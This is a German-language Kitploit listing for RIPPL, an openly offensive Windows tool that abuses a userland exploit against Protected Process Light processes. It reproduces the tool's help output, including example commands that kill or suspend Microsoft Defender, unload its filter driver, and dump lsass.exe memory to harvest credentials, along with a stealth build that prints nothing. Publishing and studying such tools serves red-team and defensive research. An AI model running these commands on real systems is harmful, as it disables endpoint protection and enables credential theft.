Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RIPPL — RIPPL is a tool that abuses a usermode only exploit to manipulate PPL processes on Windows | Kitploit
Tools/GitHubGitHub/last-byte/rippl
Privilege EscalationExploitationPost-ExploitationRed Teaming
GitHublast-byte/rippl

RIPPL

RIPPL is a tool that abuses a usermode only exploit to manipulate PPL processes on Windows

Repository anzeigen
71vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RIPPL

Manipulieren von PPL-geschützten Prozessen ohne Verwendung eines Treibers

Defender lustig

Dieses Tool implementiert einen Userland-Exploit zur Manipulation von Windows-PPL-geschützten Prozessen. Die Technik wurde ursprünglich von James Forshaw (a.k.a. @tiraniddo) und Clément Labro (a.k.a. @itm4n) in den folgenden Blogbeiträgen vorgestellt.

  • Blogbeitrag von James Forshaw: Windows Exploitation Tricks
  • Blogbeitrag von Clément Labro Teil #1: Do You Really Know About LSA Protection (RunAsPPL)?
  • Blogbeitrag von Clément Labro Teil #2: Bypassing LSA Protection in Userland

Verwendung

Warnung: Die sichere Version der Binärdatei gibt NIEMALS etwas aus, da alle Zeichenketten und die print-Funktion mithilfe bedingter Kompilierungsmakros entfernt werden.

Führen Sie die ausführbare Datei einfach ohne Argument aus, und Sie erhalten eine detaillierte Hilfe/Nutzungsanleitung (nur gültig für Binärdateien, die ohne Definition des OPSEC-Makros kompiliert wurden).

root@kitploit:~
c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter
Tool herunterladen